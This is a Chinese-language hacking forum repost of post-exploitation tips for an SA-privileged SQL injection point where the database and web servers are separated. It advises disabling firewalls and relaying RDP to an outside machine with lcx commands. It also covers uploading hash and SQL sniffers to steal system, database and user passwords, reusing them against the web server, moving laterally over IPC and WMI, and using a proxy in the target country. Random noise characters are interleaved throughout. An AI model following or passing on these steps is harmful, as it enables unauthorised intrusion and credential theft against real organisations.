当你碰到SA的注入点,可以执行命令,但是web与数据库分离,你都会怎么做呢,当数据库不服务器不能连接外网的时候,是不是只想着从web搞呢,这篇文章从t00ls转载过来,希望对大家sa权限的注入点数据库web分离提供一些渗透思路。
9 s" Z# D. z0 _' n8 \
3 G% [1 M: ~8 k% F% W6 P4 [) }! y0 z9 o3 ~7 i
) Z) c4 U. a: e- ~SA点,system权限,可执行命令,web和db分离.DB机器不上网(一般指中马不上线,lcx反弹不出)
& V q, n, H- v' }: m5 H3 H
& B7 @* @" h. M0 M N, H1 V# V3 u7 E" J
一、DB机有公网IP.0 V" o# t3 t2 g: H. `2 H" F
; q3 J) | E6 R1:执行命令把系统防火墙和ip策略停止,netstat -an找到3389端口尝试连接.
: j/ R4 p' Q: S' c) B5 f8 B! F; m8 ]; a- }2 D; R
, p! Q' i0 W$ L$ O3 W& @2:从内往外扫描.把命令行下的s扫描器转成vbs传上DB机器生成exe扫描外网一台做了端口策略的机器.这台外网机器开放所有端口.(可以到网上找这 样的 机器.) 如果扫描结果有开放端口,证明在这台DB机可以把3389转到外面机器.比如扫到80 那就lcx -slave ip 80 127.0.0.1 3389.% C% ?: C( ?4 L/ r
4 E: u4 k5 E* b) U
. @ u. @( X1 G d: d3:尽量多拿密码.用vbs的方法上传gethash,sqlsniffer类的工具.拿到系统和mssql的密 码,数据库表的后台管理员密码,member表的最前几个用户密码.这些密码可以用来测试web后台,web的3389 ftp等.当然事先要对web机器完整扫描一遍. www.2cto.com
2 m3 Z7 B' I0 @& t/ X: Q; |1 F: D: m
4 z5 u4 [; l3 [! Q1 D1 A/ L
) ^: b' x! \* C0 u3 q: ^4,nmap扫描.用nmap扫描web和db机器的1-65535端口.如果发现db机器显示有closed的端口.那恭喜你,你可以lcx -tran 把3389转发到该端口直接登陆.firewalk也有类似功能.但对代理防火墙无用.
2 f8 J1 N Y( X. A8 }
& o5 c/ d& u, T6 S$ _+ ~: U
3 |6 {/ N% w! u4 e1 x4 q3 p. h; p5 O* T" w
二、DB机只有内网IP
: G% U% m6 i8 N2 s
8 i: m8 R2 M+ q* H( @1 k& }1:尽量多拿密码来net use到web机器.这个过程需要极大的耐心 , 拿密码尝试登陆web后台等.
4 J& a5 T- |! w$ ?8 L* P8 c2 I4 {( s; D2 F% R2 T( g
/ P! p; i v/ z4 O, ]. a, Y2:停掉防火墙和IP策略再从内往外扫描.+ o ]$ [' y6 V" M# q' x3 p, K
9 c; M0 ]6 J" N9 \- y
; J0 e+ ~. K9 |, `8 A' F9 s: E6 N
3: ipconfig /dispalydns如果发现有公网的域名,极大可能是路由做了手脚.机会还是有的.; C2 t: h" H, ^
2 _9 a" x: S4 L# w. O( ^& o4 C: N% Y
* [* ], S* c- B) R& Y% x$ P4:学会密码规律分析往往会有惊喜.
9 E/ b' K% \/ J
- E) ~- h3 V! @& T$ Y8 B0 p& V( f# Z
5,在sa点里执行命令渗透内网,找可上网的机器.isql,ipc共享,wmi等
% q# @4 m- K8 r2 a3 |
3 i& ]8 I/ t2 R+ J, ]. `0 A% E" f
0 D, D% d' b' {% o有些地区或国家会禁止别的国家连接一些端口,所以拥有目标国代理或VPN是很重要的 |